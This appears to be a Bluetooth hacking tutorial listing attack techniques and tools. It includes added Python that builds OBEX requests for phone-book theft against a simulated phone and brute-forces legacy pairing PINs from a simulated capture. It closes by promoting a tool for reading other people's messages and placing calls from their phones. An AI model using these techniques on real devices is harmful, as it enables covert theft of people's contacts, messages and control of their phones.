Bluetooth Attack Theory

BlueTooth Hacking

Discovering Bluetooth Devices:-

Before two Bluetooth-enabled devices can start communicating with one another, one of them must find the other through a procedure known as discovery (inquiry).

It is carried out by scanning for other active devices within range. Only devices in discoverable mode answer an inquiry; a device set to non-discoverable has to be found by brute-forcing its address (see RedFang below).

  • Recommended Tools ⇒
    • BlueScanner
      • It will try to extract as much information as possible for each newly discovered device
    • BlueSniff
      • It is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices
    • BTBrowser
      • It is a J2ME application that can browse and explore the technical specification of surrounding Bluetooth-enabled devices.
      • It works on phones that support JSR-82, the Java Bluetooth specification
    • BTCrawler
      • It is a scanner for Windows Mobile based devices.
      • It also implements the BlueJacking and BlueSnarfing attacks

Hacking Bluetooth Devices :-

There are a variety of Bluetooth-related threats and attacks that can be executed against unsuspecting mobile phone users.

Following are some of the most common types of threats :-

1) BluePrinting Attack :-

Information gathering is the first step in the quest to break into a target system.

Even Bluetooth devices can be fingerprinted and probed for information using the technique known as BluePrinting.

A blueprint is built from the manufacturer part of the device address (the first three bytes of the BD_ADDR) together with the services the device advertises over SDP. From it one can determine the manufacturer, model, firmware version, etc. of the target device, without pairing with it.

 

Recommended Tools ⇒

  • BluePrint
  • BTScanner
    • It is an information-gathering tool that allows an attacker to query devices without the need to carry out pairing
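
The following Python, added here as an example and not code from the original post or from any of the tools listed, shows what the discovery and BluePrinting steps produce in practice. It parses the output of a BlueZ `sdptool browse` run (the sample text is constructed for a fictitious device; the address 00:11:22:33:44:55 and its services are made up), derives a Blueprinting-style fingerprint from the address's manufacturer prefix and the SDP records, and lists the RFCOMM channels that the attacks in the following sections connect to. The handle-times-channel hash is my reading of the published Blueprinting scheme and should be treated as an assumption; the OUI part is what you would look up in the IEEE registry.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample output in the format printed by BlueZ `sdptool browse <bdaddr>`.
# The address and the service set are made up for this example and do not
# describe a real device.
SAMPLE_BDADDR = "00:11:22:33:44:55"
SAMPLE_SDPTOOL_OUTPUT = """\
Browsing 00:11:22:33:44:55 ...
Service Name: Dial-up Networking
Service RecHandle: 0x10000
Service Class ID List:
  "Dialup Networking" (0x1103)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 1

Service Name: OBEX Object Push
Service RecHandle: 0x10001
Service Class ID List:
  "OBEX Object Push" (0x1105)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 9
  "OBEX" (0x0008)

Service Name: Serial Port
Service RecHandle: 0x10002
Service Class ID List:
  "Serial Port" (0x1101)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 17
"""


@dataclass
class SdpRecord:
    name: str
    handle: int               # 32-bit service record handle
    channel: Optional[int]    # RFCOMM channel, None for services without one


def parse_sdptool_browse(text: str) -> List[SdpRecord]:
    """Parse the human-readable output of `sdptool browse` into records.

    Every record has a RecHandle line; the Service Name line before it is
    optional, so the name is buffered until the handle appears.
    """
    records: List[SdpRecord] = []
    pending_name = "<unnamed>"
    current: Optional[SdpRecord] = None
    for line in text.splitlines():
        m = re.match(r"Service Name: (.+)", line)
        if m:
            pending_name = m.group(1).strip()
            continue
        m = re.match(r"Service RecHandle: 0x([0-9a-fA-F]+)", line)
        if m:
            current = SdpRecord(pending_name, int(m.group(1), 16), None)
            records.append(current)
            pending_name = "<unnamed>"
            continue
        m = re.match(r"\s+Channel: (\d+)", line)
        if m and current is not None:
            current.channel = int(m.group(1))
    return records


def blueprint(bdaddr: str, records: List[SdpRecord]) -> str:
    """Blueprinting-style fingerprint OUI@hash.

    OUI = first three bytes of the BD_ADDR (manufacturer part). The hash is
    the sum over records of handle * RFCOMM channel, my reading of the
    published scheme (assumption). Firmware with the same service layout
    yields the same value, which is what makes model identification possible.
    """
    oui = ":".join(bdaddr.upper().split(":")[:3])
    digest = sum(r.handle * r.channel for r in records if r.channel is not None)
    return f"{oui}@{digest}"


def rfcomm_channels(records: List[SdpRecord]) -> dict:
    """Service name -> RFCOMM channel: the attack surface (OBEX Object Push for
    bluejack/bluesnarf, serial channels for AT-command attacks like BlueBug)."""
    return {r.name: r.channel for r in records if r.channel is not None}


if __name__ == "__main__":
    recs = parse_sdptool_browse(SAMPLE_SDPTOOL_OUTPUT)
    print("blueprint:", blueprint(SAMPLE_BDADDR, recs))
    for name, ch in rfcomm_channels(recs).items():
        print(f"  RFCOMM channel {ch:2d}: {name}")
```

Against a real target you would feed the script the output of `hcitool scan` (for the address) and `sdptool browse <bdaddr>`; everything it needs is obtainable without pairing, which is the point of the BluePrinting section.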

2) BlueJack Attack :-

Bluejacking is the process of sending an unsolicited, anonymous message from one Bluetooth-enabled phone to another within range, typically by pushing a vCard (business card) over OBEX whose name field carries the text; the recipient sees the message but not the exact source it came from. No data leaves the victim's phone, so bluejacking is a nuisance and social-engineering vector rather than a data theft.

 

Recommended Tools ⇒

  • FreeJack
    • Bluejacking tool written in Java
  • CIHWB
    • Can I Hack With Bluetooth (CIHWB)
    • It is a Bluetooth security auditing framework for Windows Mobile 2005.
    • Supports BlueSnarf, BlueJack, and some DoS attacks. Should work on any PocketPC with the Microsoft Bluetooth stack

3) BlueSnarf Attack :-

Bluesnarfing is the process of connecting to a vulnerable mobile phone over Bluetooth and pulling data from it without the victim's knowledge.

It abuses the OBEX protocol: the attacker connects to the phone's OBEX Object Push service (meant to receive objects such as business cards) and issues OBEX GET requests for known object names, for example telecom/pb.vcf (the phone book) or telecom/cal.vcs (the calendar). Because vulnerable firmware answers these named pulls without pairing or authentication, the attack is also known as an OBEX pull attack.

OBEX ⇒ OBject EXchange ⇒ a communications protocol that facilitates the exchange of binary objects between devices

The attacker tool can be a J2ME-enabled phone running bluesnarfing tools like Blooover, RedSnarf or BlueSnarf, or a Linux machine running a command-line client such as bluesnarfer; a J2ME phone is convenient, not required.

Either way an attacker can break into the target mobile phone and steal sensitive data such as the address book, photos, MP3s, videos, SMS messages, ......!

 

Recommended Tools ⇒

  • Blooover
    • It is a J2ME-based auditing tool.
    • It is intended to serve as an auditing tool to check whether a mobile phone is vulnerable.
    • It can also be used to carry out BlueBug attack
  • RedSnarf
    • One of the best bluesnarfing tools
  • BlueSnarfer
    • It downloads the phone-book of any mobile device vulnerable to Bluesnarfing
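
As an added example (not code from the original post or from the tools it names), the Python below encodes and decodes OBEX packets and runs both sides of the exchange against an in-memory stand-in for a phone's OBEX Object Push service, covering the BlueJack section above (a PUT of a vCard carrying the message) and this BlueSnarf section (a GET for telecom/pb.vcf). The server has one switch: with `allow_named_pull=True` it behaves like the vulnerable firmware and hands over the phone book to anyone; with `allow_named_pull=False` it only serves the unnamed business-card pull that the Object Push profile legitimately allows and answers named pulls with Forbidden. The object store contents, the `OWNER_CARD` key and the `card.vcf` name are constructed; the OBEX CONNECT that precedes these requests on a real link is omitted.

```python
import struct
from typing import Dict, Optional, Tuple, Union

# Opcodes / response codes (bit 7 = FINAL, set on single-packet requests and all responses)
OP_PUT, OP_GET = 0x82, 0x83
RSP_SUCCESS, RSP_BAD_REQUEST, RSP_FORBIDDEN = 0xA0, 0xC0, 0xC3
RSP_NOT_FOUND, RSP_NOT_IMPLEMENTED = 0xC4, 0xD1
# Header identifiers; the top two bits of an ID say how its value is laid out
HI_NAME, HI_TYPE, HI_END_OF_BODY = 0x01, 0x42, 0x49


def encode_header(hid: int, value: Union[str, bytes, int]) -> bytes:
    kind = hid & 0xC0
    if kind == 0x00:  # null-terminated UTF-16BE text, 2-byte length counting the 3-byte prefix
        data = value.encode("utf-16-be") + b"\x00\x00"
        return struct.pack(">BH", hid, 3 + len(data)) + data
    if kind == 0x40:  # byte sequence, 2-byte length counting the prefix
        return struct.pack(">BH", hid, 3 + len(value)) + value
    if kind == 0x80:  # single byte
        return struct.pack(">BB", hid, value)
    return struct.pack(">BI", hid, value)  # 4-byte quantity


def decode_headers(buf: bytes) -> Dict[int, Union[str, bytes, int]]:
    headers, i = {}, 0
    while i < len(buf):
        hid, kind = buf[i], buf[i] & 0xC0
        if kind in (0x00, 0x40):
            (length,) = struct.unpack_from(">H", buf, i + 1)
            if length < 3 or i + length > len(buf):
                raise ValueError("truncated OBEX header")
            data = buf[i + 3:i + length]
            headers[hid] = data[:-2].decode("utf-16-be") if kind == 0x00 else data
            i += length
        elif kind == 0x80:
            headers[hid], i = buf[i + 1], i + 2
        else:
            headers[hid], i = struct.unpack_from(">I", buf, i + 1)[0], i + 5
    return headers


def packet(code: int, payload: bytes = b"") -> bytes:
    """OBEX packet = 1-byte opcode or response code, 2-byte total length, payload."""
    return struct.pack(">BH", code, 3 + len(payload)) + payload


def get_request(name: Optional[str]) -> bytes:
    """GET by Name is the bluesnarf pull; GET with only a vCard Type header is the
    owner's business-card pull that the Object Push profile allows."""
    if name is None:
        return packet(OP_GET, encode_header(HI_TYPE, b"text/x-vcard\x00"))
    return packet(OP_GET, encode_header(HI_NAME, name))


def put_vcard(vcard: bytes, name: str = "card.vcf") -> bytes:
    """The bluejack request: push a vCard whose text carries the message."""
    return packet(OP_PUT, encode_header(HI_NAME, name)
                  + encode_header(HI_TYPE, b"text/x-vcard\x00")
                  + encode_header(HI_END_OF_BODY, vcard))


# Constructed stand-in for the phone's object store (IrMC names plus the owner's own card)
OWNER_CARD = "<owner business card>"
PHONE_STORE = {
    OWNER_CARD: b"BEGIN:VCARD\r\nFN:Phone Owner\r\nEND:VCARD\r\n",
    "telecom/pb.vcf": b"BEGIN:VCARD\r\nFN:Example Contact\r\nTEL:+000000000\r\nEND:VCARD\r\n",
}


def opp_server_handle(request: bytes, allow_named_pull: bool) -> bytes:
    """Object Push dispatcher. allow_named_pull=True is the bluesnarf bug: any
    object can be fetched by name without pairing. The hardened path serves only
    the unnamed business-card pull and refuses named pulls."""
    if len(request) < 3 or struct.unpack_from(">H", request, 1)[0] != len(request):
        return packet(RSP_BAD_REQUEST)
    opcode = request[0]
    if opcode == OP_PUT:
        return packet(RSP_SUCCESS)  # pushed object accepted: the bluejack text pops up
    if opcode == OP_GET:
        try:
            hdrs = decode_headers(request[3:])
        except (ValueError, struct.error, IndexError):
            return packet(RSP_BAD_REQUEST)
        if HI_NAME in hdrs and not allow_named_pull:
            return packet(RSP_FORBIDDEN)
        obj = PHONE_STORE.get(hdrs.get(HI_NAME, OWNER_CARD))
        if obj is None:
            return packet(RSP_NOT_FOUND)
        return packet(RSP_SUCCESS, encode_header(HI_END_OF_BODY, obj))
    return packet(RSP_NOT_IMPLEMENTED)


def pull(name: Optional[str], allow_named_pull: bool) -> Tuple[int, bytes]:
    """Attacker side: send a GET and return (response code, pulled object or b'')."""
    rsp = opp_server_handle(get_request(name), allow_named_pull)
    if rsp[0] != RSP_SUCCESS:
        return rsp[0], b""
    return rsp[0], decode_headers(rsp[3:]).get(HI_END_OF_BODY, b"")


if __name__ == "__main__":
    print("vulnerable:", pull("telecom/pb.vcf", allow_named_pull=True))
    print("hardened:  ", pull("telecom/pb.vcf", allow_named_pull=False))
```

The difference between the two firmware behaviours is a single check on the Name header: the profile's card exchange needs no names at all, so a named GET on the push channel is always an attacker probing for IrMC objects.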

4) Blue Backdoor Attack :-

Here the attacker exploits the pairing mechanism that is used to establish a trusted connection between two Bluetooth-enabled devices: a trust relationship is created through pairing, and the entry is then removed from the victim's visible register of paired devices while the trust itself remains.

Not only does this give the attacker complete access to the target's services, it also leaves a strategic backdoor for continued access and entry long after the victim has forgotten the pairing.

 

5) BlueBug Attack :-

It was first described by Martin Herfurt in 2004 and allows attackers to gain complete control over the data, voice and messaging channels of vulnerable target mobile phones: an unauthenticated RFCOMM connection to a hidden channel reaches the phone's AT command interpreter, through which calls can be placed, SMS messages read and sent, and the phone book read or modified.

 

Recommended Tools ⇒

  • BlueBugger
    • Exploits the BlueBug vulnerability
  • Bluediving
    • It is a Bluetooth penetration testing suite.
    • It implements attacks like Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, etc.

6) Short Pairing Code Attack :-

Bluetooth legacy pairing allows PINs of up to 16 digits (16 bytes).

Unfortunately many devices continue to use only 4-digit PINs, which can be brute-forced: an attacker who sniffs a single pairing exchange (the random values and the authentication response) can try all 10,000 PINs offline against it in a fraction of a second on commodity hardware and recover the link key. This is known as the short pairing code weakness. Secure Simple Pairing (Bluetooth 2.1 and later) replaced PIN-based legacy pairing, so it applies to legacy pairing only.

Most slave devices without a keypad (headsets, car kits, GPS receivers) ship with a fixed default PIN such as 0000, 1111 or 1234, which is easier still to crack and gain access with...!

 

Recommended Tools ⇒

  • BTCrack
    • BTCrack is a Bluetooth Pass phrase (PIN) cracking tool.
    • BTCrack aims to reconstruct the Passkey and the Link key from captured Pairing exchanges
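
The short-PIN weakness above, as an added example that is not part of the original post or of BTCrack: the Python below simulates one legacy pairing and authentication between two constructed addresses, keeps only what a sniffer in range would capture (IN_RAND, the two masked LK_RAND values, AU_RAND and SRES) and then recovers the PIN and the link key offline by trying default PINs first and then all 10,000 four-digit PINs against the captured SRES. `E22`, `E21` and `E1` are stand-ins: real Bluetooth builds them on SAFER+, and HMAC-SHA256 truncated to the spec's sizes (128-bit keys, 32-bit SRES) is used here only so the structure of the attack runs end to end.

```python
import hashlib
import hmac
import os
from itertools import product
from typing import Callable, Dict, Optional, Tuple


# Stand-ins for the legacy-pairing primitives E22 (PIN -> K_init), E21 (link-key
# contribution) and E1 (authentication). Real Bluetooth uses SAFER+; truncated
# HMAC-SHA256 is an assumption made here so the example runs without a radio.
def E22(pin: bytes, bd_addr: bytes, in_rand: bytes) -> bytes:
    return hmac.new(pin, b"E22" + bd_addr + in_rand, hashlib.sha256).digest()[:16]


def E21(lk_rand: bytes, bd_addr: bytes) -> bytes:
    return hmac.new(lk_rand, b"E21" + bd_addr, hashlib.sha256).digest()[:16]


def E1(link_key: bytes, bd_addr: bytes, au_rand: bytes) -> bytes:
    return hmac.new(link_key, b"E1" + bd_addr + au_rand, hashlib.sha256).digest()[:4]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


# Constructed device addresses (not real devices).
ADDR_A = bytes.fromhex("001122334455")   # initiator, e.g. the phone
ADDR_B = bytes.fromhex("0a1b2c3d4e5f")   # slave, e.g. a headset with a fixed PIN


def legacy_pairing(pin: bytes, addr_a: bytes, addr_b: bytes,
                   rng: Callable[[int], bytes] = os.urandom) -> Dict[str, bytes]:
    """Simulate one pairing plus authentication and return exactly what a passive
    sniffer sees: addresses and the over-the-air values, never the PIN or keys."""
    in_rand = rng(16)
    k_init = E22(pin, addr_b, in_rand)                 # both sides derive K_init from the PIN
    lk_rand_a, lk_rand_b = rng(16), rng(16)
    c_a, c_b = xor(lk_rand_a, k_init), xor(lk_rand_b, k_init)   # LK_RANDs masked with K_init
    k_ab = xor(E21(lk_rand_a, addr_a), E21(lk_rand_b, addr_b))  # combination link key
    au_rand = rng(16)                                  # A challenges B
    sres = E1(k_ab, addr_b, au_rand)                   # B answers with SRES
    return {"addr_a": addr_a, "addr_b": addr_b, "in_rand": in_rand,
            "c_a": c_a, "c_b": c_b, "au_rand": au_rand, "sres": sres}


def link_key_for_pin(cap: Dict[str, bytes], pin: bytes) -> bytes:
    """Re-derive the link key from a capture under a guessed PIN."""
    k_init = E22(pin, cap["addr_b"], cap["in_rand"])
    lk_a, lk_b = xor(cap["c_a"], k_init), xor(cap["c_b"], k_init)
    return xor(E21(lk_a, cap["addr_a"]), E21(lk_b, cap["addr_b"]))


DEFAULT_PINS = [b"0000", b"1234", b"1111", b"0123", b"9999"]


def crack_pin(cap: Dict[str, bytes], digits: int = 4) -> Tuple[Optional[bytes], int]:
    """Offline brute force: default PINs first, then every numeric PIN of the given
    length, each verified against the captured SRES. Returns (pin, guesses) or
    (None, guesses) when the PIN is not in the searched space."""
    candidates = DEFAULT_PINS + ["".join(d).encode() for d in product("0123456789", repeat=digits)]
    for tries, pin in enumerate(candidates, 1):
        if E1(link_key_for_pin(cap, pin), cap["addr_b"], cap["au_rand"]) == cap["sres"]:
            return pin, tries
    return None, len(candidates)


if __name__ == "__main__":
    capture = legacy_pairing(b"4711", ADDR_A, ADDR_B)
    pin, tries = crack_pin(capture)
    print(f"PIN {pin!r} after {tries} guesses, link key {link_key_for_pin(capture, pin).hex()}")
```

Nothing in the loop depends on the strength of E22, E21 or E1; a 16-digit PIN would face 10^16 candidates in the same code, so the PIN length alone decides whether a captured pairing is crackable. The capture has to include the pairing itself, which is why Shaked and Wool (2005) also showed how an attacker impersonating one device can claim the link key was lost and force the victims to pair again.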

-: Other Powerful BlueTooth Hacking Tools :-

 

Transient Bluetooth Environment Auditor :-

 

T-BEAR is a security-auditing platform for Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and various cracking tools.

 

BlueTest :-

BlueTest is a Perl script designed to do data extraction from vulnerable Bluetooth-enabled devices.

 

BTAudit :-

BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices.

 

RedFang :-

It is a brute-force tool that finds even non-discoverable devices by guessing candidate BD_ADDRs and trying to connect to each one.

BlueAlert:-

A Windows-based tool that runs on a Bluetooth-enabled computer and alerts the user each time a Bluetooth device enters or leaves its range.

BlueFang:- Similar to BlueAlert.

Bluestumbler:- One of the best BluePrinting tools.

 

Super Bluetooth Hack :-

With this Java software you can connect to another mobile phone and ….

Once connected to another phone via Bluetooth you can:

  • Read his/her messages
  • Read his/her contacts
  • Change the profile
  • Play a ringtone even if the phone is on silent
  • Play songs
  • Restart the phone
  • Switch off the phone
  • Restore factory settings
  • Change the ringing volume
  • Place calls from his/her phone, with all call functions such as hold, etc.

Note that the connection only works once the target has accepted pairing with your phone (hence the PIN note below), so this is remote control over a trusted link, not an unauthenticated exploit.

Notes:-

When pairing the devices, use the PIN 0000.

On smartphones, turn on Bluetooth before starting the program.

To Your Success,

~meetcipher
